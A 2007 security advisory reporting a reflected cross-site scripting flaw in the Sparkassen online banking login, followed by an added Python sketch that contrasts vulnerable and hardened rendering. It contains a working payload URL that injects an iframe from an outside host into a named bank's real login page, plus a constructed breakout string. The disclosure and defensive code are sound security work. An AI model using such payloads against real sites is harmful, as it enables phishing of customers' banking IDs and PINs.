sparkassen-xss.txt

Reported 21 May 2007 by Ulrich Keil. Source: packetstormsecurity.com

Sparkassen-Finanzgruppe online banking vulnerability: impact on subsidiary banks

The "Sparkassen-Finanzgruppe", with a transaction volume of over 3.300
billion euro, is one of the largest banks for private customers in
Germany. Many local member banks of the group use the online banking
portal provided by sfze (http://www.sfze.de/), a subsidiary company of
Sparkassen-Finanzgruppe.

Vulnerability:
The online banking software of sfze does not check the HTTP GET
parameter "KONTO" on the login page, and displays the content of this
variable without modification within the HTML form area.

Impact:
An attacker may gather login data (ID+PIN) from customers of the
Sparkassen-Finanzgruppe by tricking them into clicking on a specially crafted
link, which points to the original login page of the online banking system.

Demonstration:
The following trivial example demonstrates the impact of this
vulnerability by extending the login form with an iframe:
https://bankingportal.sparkasse-donnersberg.de/banking/?BLZ=54051990&Bankingaufruf.x=0&Bankingaufruf.y=0&KONTO=%22%20/%3E%3Ciframe%20src=%22http://www.derkeiler.com/uk/sp.html%22%20scrolling=%22no%22%20marginheight=%220%22%20marginwidth=%220%22%20frameborder=%220%22width=%22310px%22

Some subsidiary companies of Sparkassen-Finanzgruppe which are affected
by this vulnerability:
- Sparkasse Donnersberg
- Sparkasse Ludwigshafen
- Sparkasse KölnBonn
- Sparkasse Aachen
- Frankfurter Sparkasse
- Sparkasse Rhein Neckar Nord

Ulrich Keil
--
http://www.derkeiler.com
PGP Fingerprint: 5FA4 4C01 8D92 A906 E831 CAF1 3F51 8F47 1233 9AAD
Public key available at http://www.derkeiler.com/uk/pgp-key.asc
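As an added illustration (not part of Keil's advisory and not sfze's code), the following Python sketch models the flaw the advisory describes: a login form that reflects the KONTO parameter verbatim into an attribute value, beside a hardened version that attribute-encodes it, plus a check that flags when a reflected value adds elements to the page. The form markup, the hypothetical host example.invalid, the digits-only account-number rule and the constructed sample value are assumptions for the example.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample value of the kind the advisory describes: it closes the
# attribute and the input tag, then opens a new element. Hypothetical host.
CONSTRUCTED_KONTO_INPUT = '" /><iframe src="http://example.invalid/frame.html'


def render_login_vulnerable(konto: str) -> str:
    """Reflects the KONTO parameter verbatim into an attribute value (the flaw)."""
    return (
        '<form method="post" action="/banking/login">'
        f'<input type="text" name="KONTO" value="{konto}" />'
        '<input type="password" name="PIN" />'
        "</form>"
    )


def render_login_hardened(konto: str) -> str:
    """Same form, but the reflected value is attribute-encoded before insertion."""
    safe = html.escape(konto, quote=True)  # encodes &, <, >, " and '
    return (
        '<form method="post" action="/banking/login">'
        f'<input type="text" name="KONTO" value="{safe}" />'
        '<input type="password" name="PIN" />'
        "</form>"
    )


def validate_konto(konto: str) -> bool:
    """Allow-list check as a second layer: account numbers are 1-10 digits (assumption)."""
    return re.fullmatch(r"[0-9]{1,10}", konto) is not None


class _TagCollector(HTMLParser):
    """Records every element name the parser sees, in document order."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def rendered_tags(markup: str) -> list:
    """Element names produced by the markup; a reflected value must not add any."""
    collector = _TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


def reflection_breaks_out(render, konto: str) -> bool:
    """True if the user-controlled value changed the element structure of the page."""
    baseline = rendered_tags(render(""))
    return rendered_tags(render(konto)) != baseline


if __name__ == "__main__":
    for name, render in (("vulnerable", render_login_vulnerable),
                         ("hardened", render_login_hardened)):
        broke = reflection_breaks_out(render, CONSTRUCTED_KONTO_INPUT)
        print(f"{name}: reflected value breaks out of the attribute = {broke}")
```

The structural check (comparing the element list with and without the parameter) is a cheap regression test to keep beside any page that echoes request parameters: encoding fixes the reflection itself, and the allow-list on KONTO rejects anything that is not an account number before it reaches the template at all.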
